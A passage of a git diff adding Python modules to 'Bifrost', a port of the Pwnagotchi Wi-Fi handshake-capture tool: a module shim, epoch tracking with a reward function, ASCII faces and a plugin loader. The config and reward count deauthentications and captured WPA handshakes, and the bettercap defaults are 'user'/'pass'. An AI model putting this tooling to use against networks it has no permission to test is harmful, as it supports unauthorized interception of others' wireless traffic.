await asyncio.sleep(2)

185
bifrost/compat.py Normal file
View File

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
"""Install the pwnagotchi namespace shim into sys.modules.
Call this BEFORE loading any pwnagotchi plugins so their
`import pwnagotchi` resolves to our shim.
"""
_start_time = time.time()
# Create the fake pwnagotchi module
pwn = types.ModuleType('pwnagotchi')
pwn.__version__ = '2.0.0-bifrost'
pwn.__file__ = __file__
pwn.config = _build_compat_config(shared_data)
def _name():
return shared_data.config.get('bjorn_name', 'bifrost')
def _set_name(n):
pass # no-op, name comes from Bjorn config
def _uptime():
return time.time() - _start_time
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
def _reboot():
pass # no-op in Bifrost — we don't auto-reboot
pwn.name = _name
pwn.set_name = _set_name
pwn.uptime = _uptime
pwn.cpu_load = _cpu_load
pwn.mem_usage = _mem_usage
pwn.temperature = _temperature
pwn.reboot = _reboot
# Register modules
sys.modules['pwnagotchi'] = pwn
sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod

292
bifrost/epoch.py Normal file
View File

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14 # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
"""Reward signal for RL — higher is better."""
def __call__(self, epoch_n, state):
eps = 1e-20
tot_epochs = epoch_n + eps
tot_interactions = max(
state['num_deauths'] + state['num_associations'],
state['num_handshakes']
) + eps
tot_channels = NUM_CHANNELS
# Positive signals
h = state['num_handshakes'] / tot_interactions
a = 0.2 * (state['active_for_epochs'] / tot_epochs)
c = 0.1 * (state['num_hops'] / tot_channels)
# Negative signals
b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
m = -0.3 * (state['missed_interactions'] / tot_interactions)
i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
_sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
_bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
s = -0.2 * (_sad / tot_epochs)
l_val = -0.1 * (_bored / tot_epochs)
return h + a + c + b + i + m + s + l_val
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
"""Tracks per-epoch counters, observations, and reward."""
def __init__(self, config):
self.epoch = 0
self.config = config
# Consecutive epoch counters
self.inactive_for = 0
self.active_for = 0
self.blind_for = 0
self.sad_for = 0
self.bored_for = 0
# Per-epoch action flags & counters
self.did_deauth = False
self.num_deauths = 0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.any_activity = False
# Timing
self.epoch_started = time.time()
self.epoch_duration = 0
# Channel histograms for AI observation
self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
self._observation = {
'aps_histogram': [0.0] * NUM_CHANNELS,
'sta_histogram': [0.0] * NUM_CHANNELS,
'peers_histogram': [0.0] * NUM_CHANNELS,
}
self._observation_ready = threading.Event()
self._epoch_data = {}
self._epoch_data_ready = threading.Event()
self._reward = RewardFunction()
def wait_for_epoch_data(self, with_observation=True, timeout=None):
self._epoch_data_ready.wait(timeout)
self._epoch_data_ready.clear()
if with_observation:
return {**self._observation, **self._epoch_data}
return self._epoch_data
def data(self):
return self._epoch_data
def observe(self, aps, peers):
"""Update observation histograms from current AP/peer lists."""
num_aps = len(aps)
if num_aps == 0:
self.blind_for += 1
else:
self.blind_for = 0
bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
self.num_peers = len(peers)
num_peers = self.num_peers + 1e-10
self.tot_bond_factor = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in peers
) / bond_unit_scale
self.avg_bond_factor = self.tot_bond_factor / num_peers
num_aps_f = len(aps) + 1e-10
num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
aps_per_chan = [0.0] * NUM_CHANNELS
sta_per_chan = [0.0] * NUM_CHANNELS
peers_per_chan = [0.0] * NUM_CHANNELS
for ap in aps:
ch_idx = ap.get('channel', 1) - 1
if 0 <= ch_idx < NUM_CHANNELS:
aps_per_chan[ch_idx] += 1.0
sta_per_chan[ch_idx] += len(ap.get('clients', []))
for peer in peers:
ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
ch_idx = ch - 1
if 0 <= ch_idx < NUM_CHANNELS:
peers_per_chan[ch_idx] += 1.0
# Normalize
aps_per_chan = [e / num_aps_f for e in aps_per_chan]
sta_per_chan = [e / num_sta for e in sta_per_chan]
peers_per_chan = [e / num_peers for e in peers_per_chan]
self._observation = {
'aps_histogram': aps_per_chan,
'sta_histogram': sta_per_chan,
'peers_histogram': peers_per_chan,
}
self._observation_ready.set()
def track(self, deauth=False, assoc=False, handshake=False,
hop=False, sleep=False, miss=False, inc=1):
"""Increment epoch counters."""
if deauth:
self.num_deauths += inc
self.did_deauth = True
self.any_activity = True
if assoc:
self.num_assocs += inc
self.did_associate = True
self.any_activity = True
if miss:
self.num_missed += inc
if hop:
self.num_hops += inc
# Reset per-channel flags on hop
self.did_deauth = False
self.did_associate = False
if handshake:
self.num_shakes += inc
self.did_handshakes = True
if sleep:
self.num_slept += inc
def next(self):
"""Transition to next epoch — compute reward, update streaks, reset counters."""
# Update activity streaks
if not self.any_activity and not self.did_handshakes:
self.inactive_for += 1
self.active_for = 0
else:
self.active_for += 1
self.inactive_for = 0
self.sad_for = 0
self.bored_for = 0
sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
if self.inactive_for >= sad_threshold:
self.bored_for = 0
self.sad_for += 1
elif self.inactive_for >= bored_threshold:
self.sad_for = 0
self.bored_for += 1
else:
self.sad_for = 0
self.bored_for = 0
now = time.time()
self.epoch_duration = now - self.epoch_started
# System metrics
cpu = _cpu_load()
mem = _mem_usage()
temp = _temperature()
# Cache epoch data for other threads
self._epoch_data = {
'duration_secs': self.epoch_duration,
'slept_for_secs': self.num_slept,
'blind_for_epochs': self.blind_for,
'inactive_for_epochs': self.inactive_for,
'active_for_epochs': self.active_for,
'sad_for_epochs': self.sad_for,
'bored_for_epochs': self.bored_for,
'missed_interactions': self.num_missed,
'num_hops': self.num_hops,
'num_peers': self.num_peers,
'tot_bond': self.tot_bond_factor,
'avg_bond': self.avg_bond_factor,
'num_deauths': self.num_deauths,
'num_associations': self.num_assocs,
'num_handshakes': self.num_shakes,
'cpu_load': cpu,
'mem_usage': mem,
'temperature': temp,
}
self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
self._epoch_data_ready.set()
logger.info(
"[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
"hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
self.epoch, int(self.epoch_duration), self.blind_for,
self.sad_for, self.bored_for, self.inactive_for, self.active_for,
self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
self.num_shakes, self._epoch_data['reward'],
)
# Reset for next epoch
self.epoch += 1
self.epoch_started = now
self.did_deauth = False
self.num_deauths = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0

66
bifrost/faces.py Normal file
View File

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
MOOD_FACES = {
'starting': STARTING,
'ready': READY,
'sleeping': SLEEP,
'awake': AWAKE,
'bored': BORED,
'sad': SAD,
'angry': ANGRY,
'excited': EXCITED,
'lonely': LONELY,
'grateful': GRATEFUL,
'happy': HAPPY,
'cool': COOL,
'intense': INTENSE,
'motivated': MOTIVATED,
'demotivated': DEMOTIVATED,
'friend': FRIEND,
'broken': BROKEN,
'debug': DEBUG,
'smart': SMART,
}
def load_from_config(config):
"""Override faces from config dict (e.g. custom emojis)."""
for face_name, face_value in (config or {}).items():
key = face_name.upper()
if key in globals():
globals()[key] = face_value
lower = face_name.lower()
if lower in MOOD_FACES:
MOOD_FACES[lower] = face_value

198
bifrost/plugins.py Normal file
View File

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}
database = {}
locks = {}
_executor = concurrent.futures.ThreadPoolExecutor(
max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
"""Base class for Bifrost/Pwnagotchi plugins.
Subclasses are auto-registered via __init_subclass__.
"""
__author__ = 'unknown'
__version__ = '0.0.0'
__license__ = 'GPL3'
__description__ = ''
__name__ = ''
__help__ = ''
__dependencies__ = []
__defaults__ = {}
def __init__(self):
self.options = {}
@classmethod
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
global loaded, locks
plugin_name = cls.__module__.split('.')[0]
plugin_instance = cls()
logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
loaded[plugin_name] = plugin_instance
for attr_name in dir(plugin_instance):
if attr_name.startswith('on_'):
cb = getattr(plugin_instance, attr_name, None)
if cb is not None and callable(cb):
locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
"""Enable or disable a plugin at runtime. Returns True if state changed."""
global loaded, database
if not enable and name in loaded:
try:
if hasattr(loaded[name], 'on_unload'):
loaded[name].on_unload()
except Exception as e:
logger.warning("Error unloading plugin %s: %s", name, e)
del loaded[name]
return True
if enable and name in database and name not in loaded:
try:
load_from_file(database[name])
if name in loaded:
one(name, 'loaded')
return True
except Exception as e:
logger.warning("Error loading plugin %s: %s", name, e)
return False
def on(event_name, *args, **kwargs):
"""Dispatch event to ALL loaded plugins."""
for plugin_name in list(loaded.keys()):
one(plugin_name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
"""Execute callback under its per-plugin lock."""
global locks
if lock_name not in locks:
locks[lock_name] = threading.Lock()
with locks[lock_name]:
cb(*args, **kwargs)
def one(plugin_name, event_name, *args, **kwargs):
"""Dispatch event to a single plugin (thread-safe)."""
global loaded
if plugin_name in loaded:
plugin = loaded[plugin_name]
cb_name = 'on_%s' % event_name
callback = getattr(plugin, cb_name, None)
if callback is not None and callable(callback):
try:
lock_name = "%s::%s" % (plugin_name, cb_name)
_executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
except Exception as e:
logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
"""Load a single plugin file."""
logger.debug("loading %s", filename)
plugin_name = os.path.basename(filename.replace(".py", ""))
spec = importlib.util.spec_from_file_location(plugin_name, filename)
instance = importlib.util.module_from_spec(spec)
spec.loader.exec_module(instance)
return plugin_name, instance
def load_from_path(path, enabled=()):
"""Scan a directory for plugins, load enabled ones."""
global loaded, database
if not path or not os.path.isdir(path):
return loaded
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
for filename in glob.glob(os.path.join(path, "*.py")):
plugin_name = os.path.basename(filename.replace(".py", ""))
database[plugin_name] = filename
if plugin_name in enabled:
try:
load_from_file(filename)
except Exception as e:
logger.warning("error loading %s: %s", filename, e)
return loaded
def load(config):
"""Load plugins from default + custom paths based on config."""
plugins_cfg = config.get('bifrost_plugins', {})
enabled = [
name for name, opts in plugins_cfg.items()
if isinstance(opts, dict) and opts.get('enabled', False)
]
# Load from default path (bifrost/plugins/)
if os.path.isdir(default_path):
load_from_path(default_path, enabled=enabled)
# Load from custom path
custom_path = config.get('bifrost_plugins_path', '')
if custom_path and os.path.isdir(custom_path):
load_from_path(custom_path, enabled=enabled)
# Propagate options
for name, plugin in loaded.items():
if name in plugins_cfg:
plugin.options = plugins_cfg[name]
on('loaded')
on('config_changed', config)
def get_loaded_info():
"""Return list of loaded plugin info dicts for web API."""
result = []
for name, plugin in loaded.items():
result.append({
'name': name,
'enabled': True,
'author': getattr(plugin, '__author__', 'unknown'),
'version': getattr(plugin, '__version__', '0.0.0'),
'description': getattr(plugin, '__description__', ''),
})
# Also include known-but-not-loaded plugins
for name, path in database.items():
if name not in loaded:
result.append({
'name': name,
'enabled': False,
'author': '',
'version': '',
'description': '',
})
return result
def shutdown():
"""Clean shutdown of plugin system."""
_executor.shutdown(wait=False)

Some files were not shown because too many files have changed in this diff Show More